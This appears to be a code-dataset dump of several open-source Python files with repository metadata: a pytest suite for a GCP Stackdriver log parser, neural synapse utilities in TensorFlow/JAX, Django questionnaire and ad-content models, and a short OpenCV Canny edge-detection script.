("servicemanagement-disable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("servicemanagement-activate-service.json", "serviceusage.googleapis.com/Service", "write", "calendar-json.googleapis.com"),
("servicemanagement-deactivate-service.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("serviceusage-enable.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("serviceusage-disable.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("dataflow-job-step.json", "dataflow.googleapis.com/Job", "write", "job-id"),
("memorystore-redis.json", "redis.googleapis.com/Instance", "write", "test-instance"),
]
test_log_resource_count_params = [
("serviceusage-batchenable.json", 3),
("compute-hardened-images.json", 3),
]
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_single_asset_log_messages(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == 1
asset_info = assets[0]
assert asset_info['resource_type'] == expected_resource_type
#assert asset_info['operation_type'] == expected_operation_type
assert asset_info['name'] == expected_resource_name
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_rpe_from_stackdriver_data(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
asset_info = assets[0]
GoogleAPIResource.from_resource_data(client_kwargs=test_google_args, **asset_info)
@pytest.mark.parametrize(
"filename,expected_resource_count",
test_log_resource_count_params
)
def test_log_resource_count(filename, expected_resource_count):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == expected_resource_count
asset_info = assets[0]
| 49.37931
| 138
| 0.752793
|
import json
import os
import pytest
from app.parsers.stackdriver import StackdriverParser
from google.oauth2.credentials import Credentials
from rpe.resources.gcp import GoogleAPIResource
test_google_args = {
'credentials': Credentials(token='bogus'),
}
def get_test_data(filename):
p = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'data',
filename,
)
with open(p) as f:
return json.load(f)
test_single_asset_log_params = [
("app-engine-debug.json", "appengine.googleapis.com/Instance", "write", "aef-default-test-instance"),
("bq-ds-set-iam-policy.json", "bigquery.googleapis.com/Dataset", "write", "wooo"),
("bigtable-set-iam-policy.json", "bigtableadmin.googleapis.com/Instance", "write", "example-instance"),
("pubsub-subscription-set-iam-policy.json", "pubsub.googleapis.com/Subscription", "write", "test-subscription"),
("pubsub-topic-set-iam-policy.json", "pubsub.googleapis.com/Topic", "write", "test-topic"),
("cloudsql-resource.labels.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.body.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.resource.instanceName.instanceId.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudfunctions-set-iam-policy.json", "cloudfunctions.googleapis.com/CloudFunction", "write", "example_function"),
("compute-subnetworks-enable-flow-logs.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-subnetworks-set-private-ip-google-access.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-firewalls-enable-logs-policy.json", "compute.googleapis.com/Firewall", "write", "test-firewall"),
("dataproc_createcluster.json", "dataproc.googleapis.com/Cluster", "write", "test-dataproc-cluster"),
("datafusion-create-instance.json", "datafusion.googleapis.com/Instance", "create", "test-instance"),
("datafusion-update-instance.json", "datafusion.googleapis.com/Instance", "write", "test-instance"),
("gke-cluster-update.json", "container.googleapis.com/Cluster", "write", "example-cluster"),
("gke-nodepool-set.json", "container.googleapis.com/NodePool", "write", "example-pool"),
("servicemanagement-enable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubeadsreach.googleapis.com"),
("servicemanagement-disable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("servicemanagement-activate-service.json", "serviceusage.googleapis.com/Service", "write", "calendar-json.googleapis.com"),
("servicemanagement-deactivate-service.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("serviceusage-enable.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("serviceusage-disable.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("dataflow-job-step.json", "dataflow.googleapis.com/Job", "write", "job-id"),
("memorystore-redis.json", "redis.googleapis.com/Instance", "write", "test-instance"),
]
test_log_resource_count_params = [
("serviceusage-batchenable.json", 3),
("compute-hardened-images.json", 3),
]
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_single_asset_log_messages(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == 1
asset_info = assets[0]
assert asset_info['resource_type'] == expected_resource_type
assert asset_info['name'] == expected_resource_name
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_rpe_from_stackdriver_data(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
asset_info = assets[0]
GoogleAPIResource.from_resource_data(client_kwargs=test_google_args, **asset_info)
@pytest.mark.parametrize(
"filename,expected_resource_count",
test_log_resource_count_params
)
def test_log_resource_count(filename, expected_resource_count):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == expected_resource_count
asset_info = assets[0]
| true
| true
|
f7193619bac808f3d98da51fdcf5aec8a4d3189e
| 7,952
|
py
|
Python
|
blur/synapse_util.py
|
DionysisChristopoulos/google-research
|
7f59ef421beef32ca16c2a7215be74f7eba01a0f
|
[
"Apache-2.0"
] | 7
|
2021-06-15T05:54:29.000Z
|
2022-02-21T06:57:06.000Z
|
blur/synapse_util.py
|
DionysisChristopoulos/google-research
|
7f59ef421beef32ca16c2a7215be74f7eba01a0f
|
[
"Apache-2.0"
] | null | null | null |
blur/synapse_util.py
|
DionysisChristopoulos/google-research
|
7f59ef421beef32ca16c2a7215be74f7eba01a0f
|
[
"Apache-2.0"
] | 5
|
2021-11-25T07:40:17.000Z
|
2022-03-22T11:13:39.000Z
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for synapse handling."""
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
TensorShape = tf.TensorShape
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
shape: TensorShape
in_neurons: int
out_neurons: int
class UpdateType(enum.Enum):
FORWARD = 1
BACKWARD = 2
BOTH = 3
NONE = 4
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]
# A callable that takes a sequence of layers and SynapseInitializer and creates
# appropriately shaped list of Synapses.
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
return (tf.random.uniform(shape, seed=seed) - 0.5) * 2
def random_initializer(start_seed=0, scale_by_channels=False,
scale=1, bias=0, random_fn=random_uniform_symmetric):
"""Returns initializer that generates random sequence."""
seed = [hash(str(start_seed))]
def impl(params):
if len(params.shape) >= 3:
# shape: species x (in+out) x (in+out) x states
num_channels = int(params.shape[-2])
seed[0] += 1
v = random_fn(params.shape, seed[0])
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def _random_uniform_fn(start_seed):
rng = np.random.RandomState(start_seed)
return lambda shape: tf.constant(rng.uniform( # pylint: disable=g-long-lambda
low=-1, high=1, size=shape), dtype=np.float32)
def fixed_random_initializer(start_seed=0,
scale_by_channels=False,
scale=1,
bias=0,
random_fn=None):
"""Returns an initializer that generates random (but fixed) sequence.
The resulting tensors are backed by a constant so they produce the same
value across all calls.
This initializer uses its own random state that is independent of default
random sequence.
Args:
start_seed: initial seed passed to np.random.RandomStates
scale_by_channels: whether to scale by number of channels.
scale: target scale (default: 1)
bias: mean of the resulting distribution.
random_fn: random generator if none will use use _random_uniform_fn
Returns:
callable that accepts shape and returns tensorflow constant tensor.
"""
if random_fn is None:
random_fn = _random_uniform_fn(start_seed)
def impl(params):
if len(params.shape) >= 3:
# shape: species x (in+out) x (in+out) x states
num_channels = int(params.shape[-2])
v = random_fn(shape=params.shape)
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def create_synapse_init_fns(
layers,
initializer):
"""Generates network synapse initializers.
Arguments:
layers: Sequence of network layers (used for shape calculation).
initializer: SynapseInitializer used to initialize synapse tensors.
Returns:
A list of functions that produce synapse tensors for all layers upon
execution.
"""
synapse_init_fns = []
for pre, post in zip(layers, layers[1:]):
# shape: population_dims, batch_size, in_channels, neuron_state
pop_dims = pre.shape[:-3]
# -2: is the number of channels
num_inputs = pre.shape[-2] + post.shape[-2] + 1
# -1: is the number of states in a single neuron.
synapse_shape = (*pop_dims, num_inputs, num_inputs, pre.shape[-1])
params = SynapseInitializerParams(
shape=synapse_shape,
in_neurons=pre.shape[-2],
out_neurons=post.shape[-2])
synapse_init_fns.append(ft.partial(initializer, params))
return synapse_init_fns
def create_synapses(layers,
initializer):
"""Generates arbitrary form synapses.
Arguments:
layers: Sequence of network layers (used for shape calculation).
initializer: SynapseInitializer used to initialize synapse tensors.
Returns:
A list of created synapse tensors for all layers.
"""
return [init_fn() for init_fn in create_synapse_init_fns(layers, initializer)]
def transpose_synapse(synapse, env):
num_batch_dims = len(synapse.shape[:-3])
perm = [
*range(num_batch_dims), num_batch_dims + 1, num_batch_dims,
num_batch_dims + 2
]
return env.transpose(synapse, perm)
def synapse_submatrix(synapse,
in_channels,
update_type,
include_bias = True):
"""Returns a submatrix of a synapse matrix given the update type."""
bias = 1 if include_bias else 0
if update_type == UpdateType.FORWARD:
return synapse[Ellipsis, :(in_channels + bias), (in_channels + bias):, :]
if update_type == UpdateType.BACKWARD:
return synapse[Ellipsis, (in_channels + 1):, :(in_channels + bias), :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
env):
"""Combines forward and backward synapses into a single matrix."""
batch_dims = in_out_synapse.shape[:-3]
out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
synapse = env.concat([
env.concat([
env.zeros((*batch_dims, out_channels, out_channels, num_states)),
in_out_synapse
], axis=-2),
env.concat([
out_in_synapse,
env.zeros((*batch_dims, in_channels, in_channels, num_states))
], axis=-2)
], axis=-3)
return synapse
def sync_all_synapses(synapses, layers, env):
"""Sync synapses across all layers.
For each synapse, syncs its first state forward synapse with backward synapse
and copies it arocess all the states.
Args:
synapses: list of synapses in the network.
layers: list of layers in the network.
env: Environment
Returns:
Synchronized synapses.
"""
for i in range(len(synapses)):
synapses[i] = sync_in_and_out_synapse(synapses[i], layers[i].shape[-2], env)
return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
"""Copies forward synapse to backward one."""
in_out_synapse = synapse_submatrix(
synapse,
in_channels=in_channels,
update_type=UpdateType.FORWARD,
include_bias=True)
return combine_in_out_synapses(
in_out_synapse,
transpose_synapse(in_out_synapse, env),
env)
def sync_states_synapse(synapse, env, num_states=None):
"""Sync synapse's first state across all the other states."""
if num_states is None:
num_states = synapse.shape[-1]
return env.stack(num_states*[synapse[Ellipsis, 0]], axis=-1)
def normalize_synapses(synapses,
rescale_to,
env,
axis = -3):
"""Normalizes synapses across a particular axis (across input by def.)."""
# Default value axis=-3 corresponds to normalizing across the input neuron
# dimension.
squared = env.sum(synapses ** 2, axis=axis, keepdims=True)
synapses /= env.sqrt(squared + 1e-9)
if rescale_to is not None:
synapses *= rescale_to
return synapses
| 31.43083
| 80
| 0.689764
|
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
TensorShape = tf.TensorShape
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
shape: TensorShape
in_neurons: int
out_neurons: int
class UpdateType(enum.Enum):
FORWARD = 1
BACKWARD = 2
BOTH = 3
NONE = 4
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
return (tf.random.uniform(shape, seed=seed) - 0.5) * 2
def random_initializer(start_seed=0, scale_by_channels=False,
scale=1, bias=0, random_fn=random_uniform_symmetric):
seed = [hash(str(start_seed))]
def impl(params):
if len(params.shape) >= 3:
num_channels = int(params.shape[-2])
seed[0] += 1
v = random_fn(params.shape, seed[0])
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def _random_uniform_fn(start_seed):
rng = np.random.RandomState(start_seed)
return lambda shape: tf.constant(rng.uniform(
low=-1, high=1, size=shape), dtype=np.float32)
def fixed_random_initializer(start_seed=0,
scale_by_channels=False,
scale=1,
bias=0,
random_fn=None):
if random_fn is None:
random_fn = _random_uniform_fn(start_seed)
def impl(params):
if len(params.shape) >= 3:
num_channels = int(params.shape[-2])
v = random_fn(shape=params.shape)
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def create_synapse_init_fns(
layers,
initializer):
synapse_init_fns = []
for pre, post in zip(layers, layers[1:]):
pop_dims = pre.shape[:-3]
num_inputs = pre.shape[-2] + post.shape[-2] + 1
synapse_shape = (*pop_dims, num_inputs, num_inputs, pre.shape[-1])
params = SynapseInitializerParams(
shape=synapse_shape,
in_neurons=pre.shape[-2],
out_neurons=post.shape[-2])
synapse_init_fns.append(ft.partial(initializer, params))
return synapse_init_fns
def create_synapses(layers,
initializer):
return [init_fn() for init_fn in create_synapse_init_fns(layers, initializer)]
def transpose_synapse(synapse, env):
num_batch_dims = len(synapse.shape[:-3])
perm = [
*range(num_batch_dims), num_batch_dims + 1, num_batch_dims,
num_batch_dims + 2
]
return env.transpose(synapse, perm)
def synapse_submatrix(synapse,
in_channels,
update_type,
include_bias = True):
bias = 1 if include_bias else 0
if update_type == UpdateType.FORWARD:
return synapse[Ellipsis, :(in_channels + bias), (in_channels + bias):, :]
if update_type == UpdateType.BACKWARD:
return synapse[Ellipsis, (in_channels + 1):, :(in_channels + bias), :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
env):
batch_dims = in_out_synapse.shape[:-3]
out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
synapse = env.concat([
env.concat([
env.zeros((*batch_dims, out_channels, out_channels, num_states)),
in_out_synapse
], axis=-2),
env.concat([
out_in_synapse,
env.zeros((*batch_dims, in_channels, in_channels, num_states))
], axis=-2)
], axis=-3)
return synapse
def sync_all_synapses(synapses, layers, env):
for i in range(len(synapses)):
synapses[i] = sync_in_and_out_synapse(synapses[i], layers[i].shape[-2], env)
return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
in_out_synapse = synapse_submatrix(
synapse,
in_channels=in_channels,
update_type=UpdateType.FORWARD,
include_bias=True)
return combine_in_out_synapses(
in_out_synapse,
transpose_synapse(in_out_synapse, env),
env)
def sync_states_synapse(synapse, env, num_states=None):
if num_states is None:
num_states = synapse.shape[-1]
return env.stack(num_states*[synapse[Ellipsis, 0]], axis=-1)
def normalize_synapses(synapses,
rescale_to,
env,
axis = -3):
squared = env.sum(synapses ** 2, axis=axis, keepdims=True)
synapses /= env.sqrt(squared + 1e-9)
if rescale_to is not None:
synapses *= rescale_to
return synapses
| true
| true
|
f71936663f2310c9c86574acc5b1c59f865d0108
| 3,113
|
py
|
Python
|
questionnaire/models.py
|
cjz25/cquestionnaire
|
961c508d463a8d9d50c8485fa65c4a9d3a56e5fa
|
[
"MIT"
] | null | null | null |
questionnaire/models.py
|
cjz25/cquestionnaire
|
961c508d463a8d9d50c8485fa65c4a9d3a56e5fa
|
[
"MIT"
] | null | null | null |
questionnaire/models.py
|
cjz25/cquestionnaire
|
961c508d463a8d9d50c8485fa65c4a9d3a56e5fa
|
[
"MIT"
] | 1
|
2021-10-15T12:51:01.000Z
|
2021-10-15T12:51:01.000Z
|
from django.db import models
# from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _
# Create your models here.
class Questionnaire(models.Model):
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
# created_by = models.ForeignKey(User, on_delete=models.CASCADE)
updated_dtm = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Question(models.Model):
# short answer, multiple choice, checkboxes
# https://docs.djangoproject.com/en/3.1/ref/models/fields/#enumeration-types
class QuestionType(models.TextChoices):
SHORT_ANSWER = 'SA', _('Short Answer')
MULTIPLE_CHOICE = 'MC', _('Multiple Choice')
CHECKBOXES = 'CB', _('Checkboxes')
questionnaire = models.ForeignKey(
Questionnaire,
on_delete=models.CASCADE,
related_name='questions'
)
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
required = models.BooleanField()
question_type = models.CharField(
max_length=2,
choices=QuestionType.choices,
default=QuestionType.SHORT_ANSWER,
)
visible = models.BooleanField()
def __str__(self):
return f'{self.questionnaire.title} | {self.title}'
class QuestionSequence(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('questionnaire', 'question'),)
class QuestionChoice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
item = models.CharField(max_length=100)
def __str__(self):
return f'{self.question.title} | {self.item}'
class QuestionChoiceSequence(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
questionchoice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('question', 'questionchoice'),)
# response master
class QuestionResponseMaster(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
# response detail
class QuestionResponseDetail(models.Model):
response_master_id = models.ForeignKey(QuestionResponseMaster, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
# response for question types: multiple choice, checkboxes
class QuestionResponseSelection(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
choice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
# response for question type: short answer
class QuestionResponseText(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
text = models.TextField()
| 33.836957
| 92
| 0.73948
|
from django.db import models
from django.utils.translation import gettext_lazy as _
class Questionnaire(models.Model):
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
updated_dtm = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Question(models.Model):
nType(models.TextChoices):
SHORT_ANSWER = 'SA', _('Short Answer')
MULTIPLE_CHOICE = 'MC', _('Multiple Choice')
CHECKBOXES = 'CB', _('Checkboxes')
questionnaire = models.ForeignKey(
Questionnaire,
on_delete=models.CASCADE,
related_name='questions'
)
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
required = models.BooleanField()
question_type = models.CharField(
max_length=2,
choices=QuestionType.choices,
default=QuestionType.SHORT_ANSWER,
)
visible = models.BooleanField()
def __str__(self):
return f'{self.questionnaire.title} | {self.title}'
class QuestionSequence(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('questionnaire', 'question'),)
class QuestionChoice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
item = models.CharField(max_length=100)
def __str__(self):
return f'{self.question.title} | {self.item}'
class QuestionChoiceSequence(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
questionchoice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('question', 'questionchoice'),)
class QuestionResponseMaster(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
class QuestionResponseDetail(models.Model):
response_master_id = models.ForeignKey(QuestionResponseMaster, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
class QuestionResponseSelection(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
choice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
class QuestionResponseText(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
text = models.TextField()
| true
| true
|
f7193789b5657ecbc5688792c3078421cbb68e5f
| 1,193
|
py
|
Python
|
meiduo_mall/meiduo_mall/apps/contents/models.py
|
0-pangda/meiduo_project1
|
69d771d9c5b67c01510ecfabe4c28989e44d0fba
|
[
"MIT"
] | null | null | null |
meiduo_mall/meiduo_mall/apps/contents/models.py
|
0-pangda/meiduo_project1
|
69d771d9c5b67c01510ecfabe4c28989e44d0fba
|
[
"MIT"
] | null | null | null |
meiduo_mall/meiduo_mall/apps/contents/models.py
|
0-pangda/meiduo_project1
|
69d771d9c5b67c01510ecfabe4c28989e44d0fba
|
[
"MIT"
] | null | null | null |
from django.db import models
from meiduo_mall.utils.models import BaseModel
# Create your models here.
class ContentCategory(BaseModel):
"""广告内容类别"""
name = models.CharField(max_length=50, verbose_name='名称')
key = models.CharField(max_length=50, verbose_name='类别键名')
class Meta:
db_table = 'tb_content_category'
verbose_name = '广告内容类别'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Content(BaseModel):
"""广告内容"""
category = models.ForeignKey(ContentCategory, on_delete=models.PROTECT, verbose_name='类别')
title = models.CharField(max_length=100, verbose_name='标题')
url = models.CharField(max_length=300, verbose_name='内容链接')
image = models.ImageField(null=True, blank=True, verbose_name='图片')
text = models.TextField(null=True, blank=True, verbose_name='内容')
sequence = models.IntegerField(verbose_name='排序')
status = models.BooleanField(default=True, verbose_name='是否展示')
class Meta:
db_table = 'tb_content'
verbose_name = '广告内容'
verbose_name_plural = verbose_name
def __str__(self):
return self.category.name + ': ' + self.title
| 32.243243
| 94
| 0.695725
|
from django.db import models
from meiduo_mall.utils.models import BaseModel
class ContentCategory(BaseModel):
name = models.CharField(max_length=50, verbose_name='名称')
key = models.CharField(max_length=50, verbose_name='类别键名')
class Meta:
db_table = 'tb_content_category'
verbose_name = '广告内容类别'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Content(BaseModel):
category = models.ForeignKey(ContentCategory, on_delete=models.PROTECT, verbose_name='类别')
title = models.CharField(max_length=100, verbose_name='标题')
url = models.CharField(max_length=300, verbose_name='内容链接')
image = models.ImageField(null=True, blank=True, verbose_name='图片')
text = models.TextField(null=True, blank=True, verbose_name='内容')
sequence = models.IntegerField(verbose_name='排序')
status = models.BooleanField(default=True, verbose_name='是否展示')
class Meta:
db_table = 'tb_content'
verbose_name = '广告内容'
verbose_name_plural = verbose_name
def __str__(self):
return self.category.name + ': ' + self.title
| true
| true
|
f719378c3733c997ba58b7324d53b78e85a768f4
| 301
|
py
|
Python
|
opencv-python/ex6_image_canny.py
|
jemygraw/opencv-tutorial
|
2b85b5bf4b1e6ba416733a5b903752462101725e
|
[
"MIT"
] | null | null | null |
opencv-python/ex6_image_canny.py
|
jemygraw/opencv-tutorial
|
2b85b5bf4b1e6ba416733a5b903752462101725e
|
[
"MIT"
] | null | null | null |
opencv-python/ex6_image_canny.py
|
jemygraw/opencv-tutorial
|
2b85b5bf4b1e6ba416733a5b903752462101725e
|
[
"MIT"
] | 2
|
2019-06-03T16:07:03.000Z
|
2019-07-24T08:36:00.000Z
|
import cv2
fname = '/Users/jemy/Documents/github-avatar.png'
img = cv2.imread(fname, cv2.CAP_MODE_GRAY)
cv2.namedWindow('Example6', cv2.WINDOW_AUTOSIZE)
cv2.imshow('Example6', img)
# canny
imgOut = cv2.Canny(img, 0, 100)
cv2.imshow('Example6', imgOut)
cv2.waitKey(0)
cv2.destroyWindow('Example6')
| 20.066667
| 49
| 0.744186
|
import cv2
fname = '/Users/jemy/Documents/github-avatar.png'
img = cv2.imread(fname, cv2.CAP_MODE_GRAY)
cv2.namedWindow('Example6', cv2.WINDOW_AUTOSIZE)
cv2.imshow('Example6', img)
imgOut = cv2.Canny(img, 0, 100)
cv2.imshow('Example6', imgOut)
cv2.waitKey(0)
cv2.destroyWindow('Example6')
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.